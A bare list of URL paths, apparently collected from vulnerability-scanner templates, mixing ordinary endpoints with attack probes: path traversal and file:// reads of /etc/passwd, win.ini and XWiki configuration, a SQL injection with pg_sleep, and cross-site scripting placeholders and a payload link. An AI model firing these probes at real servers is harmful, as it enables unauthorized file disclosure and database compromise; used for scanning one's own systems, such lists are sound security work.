/ajax/reload_basket_fly.php
/ajax/show_basket_fly.php
/ajax/show_basket_popup.php
/include/mainpage/comp_catalog_ajax.php
/bitrix/components/aspro/oneclickbuy.max/script.php
/bitrix/components/aspro/form.allcorp2/component.php
/ajax/form.php
/controlloLogin.js
/index.php?mod=textviewer&src=file:///etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/{{js_file_url}}
/auth/failure?provider={{redirect_payload}}
/auth/failure?provider={{basic_xss}}
/unified-console.html
/{{path}}
{{path}}
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-admin/admin-ajax.php
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg
/trufusionPortal/jsp/internal_admin_contact_login.jsp
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg
/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName
/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.
/download_work_dir_file?path=/etc/passwd
/hx/resources/public/$SCHEMAS$?Filename=c%3a%5cwindows%5cwin.ini
